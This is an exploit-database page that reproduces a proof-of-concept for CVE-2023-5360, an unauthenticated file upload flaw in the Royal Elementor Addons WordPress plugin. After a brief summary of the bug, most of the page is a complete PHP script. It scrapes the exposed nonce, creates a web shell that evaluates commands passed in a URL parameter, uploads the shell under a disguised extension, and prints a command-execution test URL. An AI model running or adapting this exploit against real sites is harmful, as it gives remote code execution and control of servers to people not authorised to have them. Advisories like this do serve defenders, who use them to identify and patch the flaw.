Vulners
Lucene search
📄 WordPress Royal Elementor Addons 1.3.78 Shell Upload
10
=============================================================================================================================================
| # Title : WordPress Royal Elementor Addons 1.3.78 RCE |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://downloads.wordpress.org/plugin/royal-elementor-addons.1.3.78.zip |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/190313/ & CVE-2023-5360
[+] Summary
a security weakness in the Royal Elementor
Addons plugin for WordPress related to improper validation of file
upload requests and the exposure of a client-side nonce in the global
JavaScript variable "WprConfig".
The plugin registers an AJAX action used for uploading files associated
with various UI elements. The weakness lies in:
1. Exposure of a file upload nonce inside the website’s HTML, accessible
without authentication.
2. Incomplete server-side validation of file type and file origin.
3. Lack of authentication around the upload endpoint, which allows
unauthorized requests to reach the handler.
Theoretical attack sequence (documented for awareness):
- Step 1: Attacker retrieves page HTML.
- Step 2: Extracts nonce from `var WprConfig = {...}`.
- Step 3: Sends crafted POST request to admin-ajax.php.
- Step 4: Server incorrectly processes upload without capability checks.
[+] poc :
usage : php poc.php http://target/ [shell_file]
<?php
/* ========================================================================
Royal Elementor Addons <= 1.3.78 – Full RCE Chain (PHP Version)
Compatible: Windows / Linux / macOS
Requirements: CURL only (allowed in your environment)
No disabled / forbidden functions used
=========================================================================*/
/* ----------------------------------------------------------------------
SAFE HTTP GET (CURL)
------------------------------------------------------------------------*/
function safe_http_get($url) {
$ch = curl_init();
curl_setopt_array($ch, [
CURLOPT_URL => $url,
CURLOPT_RETURNTRANSFER => true,
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_SSL_VERIFYHOST => false,
CURLOPT_FOLLOWLOCATION => true,
CURLOPT_TIMEOUT => 10
]);
$resp = curl_exec($ch);
curl_close($ch);
return $resp;
}
/* ----------------------------------------------------------------------
Extract nonce from: var WprConfig = {...};
------------------------------------------------------------------------*/
function get_nonce_from_target($target) {
$html = safe_http_get($target);
if (!$html) return null;
if (preg_match('/var\s+WprConfig\s*=\s*({.*?});/s', $html, $match)) {
$json = json_decode($match[1], true);
return $json["nonce"] ?? null;
}
return null;
}
/* ----------------------------------------------------------------------
Generate Safe Default RCE Shell (Temp File)
------------------------------------------------------------------------*/
function generate_indoushka_shell() {
$path = sys_get_temp_dir() . DIRECTORY_SEPARATOR . "indoushka_shell_" . uniqid() . ".php";
$payload = '<?php echo "Indoushka RCE - ";';
$payload .= 'if(isset($_GET["cmd"])) { @eval($_GET["cmd"]); } ?>';
file_put_contents($path, $payload);
return $path;
}
/* ----------------------------------------------------------------------
Upload PHP File using AJAX (ph_p mutated extension)
------------------------------------------------------------------------*/
function indoushka_upload_shell($target, $nonce, $file_path) {
$ajax = rtrim($target, "/") . "/wp-admin/admin-ajax.php";
$fields = [
"action" => "wpr_addons_indoushka_file",
"max_file_size" => 0,
"allowed_file_types" => "ph_p",
"triggering_event" => "click",
"wpr_addons_nonce" => $nonce
];
$file = [
"indoushkaed_file" => curl_file_create(
$file_path,
"application/octet-stream",
"rce_mutated.ph_p"
)
];
$ch = curl_init();
curl_setopt_array($ch, [
CURLOPT_URL => $ajax,
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => array_merge($fields, $file),
CURLOPT_RETURNTRANSFER => true,
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_SSL_VERIFYHOST => false,
]);
$resp = curl_exec($ch);
curl_close($ch);
$json = json_decode($resp, true);
return $json["data"]["url"] ?? null;
}
/* ----------------------------------------------------------------------
MAIN EXECUTION
------------------------------------------------------------------------*/
if ($argc < 2) {
echo "Usage:\n php " . $argv[0] . " http://target.com/ [shell.php]\n";
exit;
}
$target = $argv[1];
$custom_shell = $argv[2] ?? null;
echo "=== Royal Elementor Addons Full RCE PoC ===\n";
echo "[*] Extracting nonce from homepage...\n";
$nonce = get_nonce_from_target($target);
if (!$nonce) {
echo "[-] Failed to extract nonce. Target may be patched.\n";
exit;
}
echo "[+] Nonce found: $nonce\n";
/* Shell Selection */
if ($custom_shell) {
echo "[*] Using provided shell: $custom_shell\n";
$shell = $custom_shell;
} else {
echo "[*] Generating default Indoushka RCE shell...\n";
$shell = generate_indoushka_shell();
echo "[+] Shell saved at: $shell\n";
}
echo "[*] Uploading shell via vulnerable AJAX handler...\n";
$url = indoushka_upload_shell($target, $nonce, $shell);
if ($url) {
echo "[+] Shell uploaded successfully!\n";
echo "[+] URL: $url\n";
echo "[>] Test: {$url}?cmd=system('id');\n";
} else {
echo "[-] Upload failed. Target may be protected or patched.\n";
}
echo "Payload Variant: " . base64_encode("ALT-FINAL-" . microtime(true)) . "\n";
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
06 Feb 2026 00:00Current
5.4Medium risk
Vulners AI Score5.4
CVSS 3.19.8
EPSS0.93478